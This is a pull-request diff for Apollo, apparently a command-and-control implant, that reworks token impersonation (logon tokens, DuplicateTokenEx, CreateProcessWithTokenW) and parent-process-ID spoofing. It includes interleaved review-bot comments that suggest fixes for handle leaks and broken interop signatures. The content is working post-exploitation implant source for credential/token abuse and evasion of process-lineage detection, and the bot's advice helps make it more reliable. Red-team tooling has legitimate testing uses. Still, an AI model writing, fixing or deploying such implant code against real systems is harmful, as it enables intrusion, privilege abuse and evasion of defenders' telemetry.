Merge pull request #53 from MythicAgents/token_impersonation_bugfix
Token Impersonation and PPID Spoofing
djhohnstein authored Aug 27, 2021
2 parents 448f9cd + 9661e57 commit b3f8fe7
Showing 8 changed files with 199 additions and 131 deletions.
Expand Up @@ -44,7 +44,7 @@ public static void Execute(Job job, Agent agent)
job.SetComplete($"Set parent process ID of post-ex jobs to {pid}");
} else
{
job.SetError($"Failed to set parent process ID to {pid}. Ensure process with ID {pid} is running.");
job.SetError($"Failed to set parent process ID to {pid}. Ensure process with ID {pid} is running and in the same desktop session as Apollo.");
}
}
}
Expand Up @@ -138,7 +138,7 @@ public static void Execute(Job job, Agent implant)
{
if (sacrificialProcess.ExitCode == 0 && sacrificialProcess.PID != 0)
{
job.SetComplete(String.Format("\nProcess executed '{0}' with PID {1} and returned exit code {2}", cmdString, sacrificialProcess.PID, sacrificialProcess.ExitCode));
job.SetComplete("");
} else
{
job.SetError($"Unknown error. Exit code: {sacrificialProcess.ExitCode} from PID: {sacrificialProcess.PID}");
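Review bot: If `job.SetComplete("")` is the new side of this hunk (the rendered page does not mark which of the two SetComplete lines was removed), the operator loses the sacrificial process's PID and exit code from the task result, which are the details needed to correlate a post-ex job with the process in host telemetry or to clean it up afterwards. Unless that information is already emitted elsewhere (not visible here), keeping a short status such as `job.SetComplete($"Process exited with code {sacrificialProcess.ExitCode} (PID {sacrificialProcess.PID})")` seems worth it. The surrounding condition also reports any non-zero exit code as "Unknown error" even though the process was created and ran; that is pre-existing, but the error text could state that the process started and returned that code. Execute's body begins and ends outside this hunk.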
Expand Up @@ -23,8 +23,6 @@
#define SPAWN
#endif

#define POWERPICK

#if MAKE_TOKEN || PRINTSPOOFER||SPAWN||STEAL_TOKEN || REV2SELF || GETPRIVS || WHOAMI || POWERPICK || MIMIKATZ || EXECUTE_ASSEMBLY


Expand Down Expand Up @@ -69,7 +67,8 @@ internal static class CredentialManager

private static IntPtr phImpersonatedImpersonationToken = IntPtr.Zero;
private static IntPtr phImpersonatedPrimaryToken = IntPtr.Zero;
internal static WindowsIdentity CurrentIdentity { get; private set; } = WindowsIdentity.GetCurrent();
internal static WindowsIdentity OriginalIdentity { get; private set; } = WindowsIdentity.GetCurrent();
internal static WindowsIdentity CurrentIdentity { get; private set; } = OriginalIdentity;

// I think there might be a race condition with pth and this
private static IntPtr executingThread = IntPtr.Zero;
Expand Down Expand Up @@ -125,19 +124,21 @@ internal static bool SetCredential(string username, string password, string doma
}
else
{
phImpersonatedPrimaryToken = hToken;
bRet = DuplicateTokenEx(
phImpersonatedPrimaryToken,
TokenAccessLevels.MaximumAllowed,
IntPtr.Zero,
TokenImpersonationLevel.Impersonation,
TOKEN_TYPE.TokenImpersonation,
out IntPtr dupToken);
if (bRet)
SetImpersonatedImpersonationToken(dupToken);
else
if (SetImpersonatedPrimaryToken(hToken))
{
RevertToSelf();
bRet = DuplicateTokenEx(
phImpersonatedPrimaryToken,
TokenAccessLevels.MaximumAllowed,
IntPtr.Zero,
TokenImpersonationLevel.Impersonation,
TOKEN_TYPE.TokenImpersonation,
out IntPtr dupToken);
if (bRet)
SetImpersonatedImpersonationToken(dupToken);
else
{
RevertToSelf();
}
}

}
Expand Down Expand Up @@ -324,11 +325,12 @@ internal static void FlushCredentials()
phImpersonatedPrimaryToken = IntPtr.Zero;
phImpersonatedImpersonationToken = IntPtr.Zero;
userCredential = new Credential();
CurrentIdentity = new WindowsIdentity(originalImpersonationToken);
CurrentIdentity = OriginalIdentity;
}

internal static bool SetImpersonatedPrimaryToken(IntPtr hToken)
{
// add the requisite privs for createprocessasuser call when necessary
if (!initialized)
return false;
bool bRet = true;
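Review bot: In the new SetCredential path a false return from `SetImpersonatedPrimaryToken(hToken)` falls straight through with no failure handling: the `hToken` obtained from the logon is never closed, and `bRet` keeps whatever value it had before the `else` branch, which appears to be the result of the preceding logon call, so the caller is told the credential was set although no token was stored. SetImpersonatedPrimaryToken returns false at least when `initialized` is false (visible in the later hunk of this file), so the path is reachable. Add an else branch on that `if`, `else { bRet = false; CloseHandle(hToken); }`, using whichever CloseHandle P/Invoke this file already binds. The DuplicateTokenEx failure branch likewise leaves the primary token stored while calling `RevertToSelf()`; setting `bRet = false` there keeps the return value consistent with the stored state. SetCredential begins and ends outside this hunk.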
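--- a/Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs
@@ -90,9 +90,15 @@ internal static bool SetParentProcessId(int processId)
 bool bRet = false;
 try
 {
-System.Diagnostics.Process.GetProcessById(processId);
-bRet = true;
-_parentProcessId = processId;
+var curProc = System.Diagnostics.Process.GetCurrentProcess();
+var proc = System.Diagnostics.Process.GetProcessById(processId);
+if (proc.SessionId != curProc.SessionId)
+bRet = false;
+else
+{
+bRet = true;
+_parentProcessId = processId;
+}
 } catch { }
 return bRet;
 }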
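Review bot: The two `Process` objects created for the session check (`curProc`, `proc`) are never disposed; `System.Diagnostics.Process` owns a process handle, so both should be wrapped in `using` blocks. The bare `catch { }` keeps the call best-effort, which is fine for a job that only records a PID, but it deserves a comment saying which failures it is expected to absorb (no process with that id, or the process exiting before its session could be read) so the next reader does not mistake it for an oversight. The session comparison is also a point-in-time check: `_parentProcessId` is kept as a raw PID, so if that process exits before the spawn and the PID is reused, the later spawn targets a process that was never validated here; a comment to that effect is worth adding. SetParentProcessId begins before this hunk and ends inside it.
```csharp
bool bRet = false;
try
{
    using (var curProc = System.Diagnostics.Process.GetCurrentProcess())
    using (var proc = System.Diagnostics.Process.GetProcessById(processId))
    {
        // Only accept a parent in the agent's own session; other sessions are rejected up front.
        // NOTE: this is a point-in-time check on a raw PID; PID reuse before the spawn is not detected.
        if (proc.SessionId == curProc.SessionId)
        {
            bRet = true;
            _parentProcessId = processId;
        }
    }
}
catch { } // best effort: no process with this id, or it exited before its session could be read
return bRet;
```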
71 changes: 40 additions & 31 deletions Payload_Type/apollo/agent_code/Apollo/Native/Methods.cs
Expand Up @@ -216,13 +216,25 @@ internal extern static bool LogonUserA(
LOGON_PROVIDER dwLogonProvider,
out IntPtr phToken);

[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
internal static extern bool CreateProcessWithTokenW(
SafeFileHandle hToken,
LogonFlags dwLogonFlags,
string lpApplicationName,
string lpCommandLine,
CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
[In] ref StartupInfo lpStartupInfo,
out ProcessInformation lpProcessInformation);

[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
internal static extern bool CreateProcessWithTokenW(
IntPtr hToken,
IntPtr dwLogonFlags,
LogonFlags dwLogonFlags,
string lpApplicationName,
string lpCommandLine,
ProcessCreationFlags dwCreationFlags,
CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
[In] ref STARTUPINFO lpStartupInfo,
Expand Down Expand Up @@ -264,34 +276,17 @@ internal static extern bool CreateProcessWithTokenW(
[In] ref StartupInfoEx lpStartupInfo,
out ProcessInformation lpProcessInformation);


[DllImport("advapi32.dll", SetLastError = true)]
internal static extern bool CreateProcessAsUserA(
IntPtr hToken,
string lpApplicationName,
StringBuilder lpCommandLine,
SECURITY_ATTRIBUTES lpProcessAttributes,
SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
ProcessCreationFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);

[DllImport("advapi32.dll", SetLastError = true)]
internal static extern bool CreateProcessAsUserA(
IntPtr hToken,
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
internal static extern bool CreateProcessWithTokenW(
SafeFileHandle hToken,
LogonFlags dwLogonFlags,
string lpApplicationName,
StringBuilder lpCommandLine,
SECURITY_ATTRIBUTES lpProcessAttributes,
SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
ProcessCreationFlags dwCreationFlags,
string lpCommandLine,
CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
StartupInfoEx lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
[In] ref StartupInfoEx lpStartupInfo,
out ProcessInformation lpProcessInformation);


[DllImport("kernel32.dll")]
Expand Down Expand Up @@ -497,7 +492,7 @@ DWORD dwThreadId
);*/


[DllImport("kernel32.dll")]
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
IntPtr hSourceHandle,
Expand All @@ -508,17 +503,28 @@ public static extern bool DuplicateHandle(
DuplicateOptions dwOptions
);

[DllImport("kernel32.dll")]
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
SafeFileHandle hSourceHandle,
IntPtr hTargetProcessHandle,
SafeFileHandle hTargetProcessHandle,
ref SafeFileHandle lpTargetHandle,
uint dwDesiredAccess,
bool bInheritHandle,
DuplicateOptions dwOptions
);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
SafeFileHandle hSourceHandle,
SafeFileHandle hTargetProcessHandle,
ref SafeFileHandle lpTargetHandle,
System.Enum dwDesiredAccess,
bool bInheritHandle,
DuplicateOptions dwOptions
);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(ThreadAccessRights dwDesiredAccess, bool bInheritHandle, uint dwThreadId);

Expand Down Expand Up @@ -992,9 +998,12 @@ internal static extern IntPtr SHGetFileInfo(

#region USERENV

[DllImport("userenv.dll", SetLastError = true)]
[DllImport("userenv.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);

[DllImport("userenv.dll", SetLastError = true)]
public static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);

#endregion
}
}
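Review bot: The added third `DuplicateHandle` overload types `dwDesiredAccess` as `System.Enum`, which is not a blittable type; I would expect the interop marshaler to throw at call time rather than pass the underlying DWORD, since an abstract class with no layout has no default unmanaged representation. The overload directly above it already takes `uint dwDesiredAccess`, so callers can pass `(uint)access` and this overload can be dropped, or it can be declared with the concrete access-rights enum its callers use (for example `ThreadAccessRights`, which this file already references). Separately, the new `CreateProcessWithTokenW` overload taking `[In] ref StartupInfoEx` is only valid when the caller sets the `cb` field of the embedded startup-info struct to the extended size and includes the extended-startup-info creation flag; a one-line comment above that declaration stating this contract would make it visible where the binding is defined.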
2 changes: 1 addition & 1 deletion Payload_Type/apollo/agent_code/Apollo/Native/Structures.cs
Expand Up @@ -24,7 +24,7 @@ public struct SECURITY_DESCRIPTOR
public IntPtr dacl;
}

[StructLayout(LayoutKind.Sequential)]
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct StartupInfo
{
public Int32 cb;
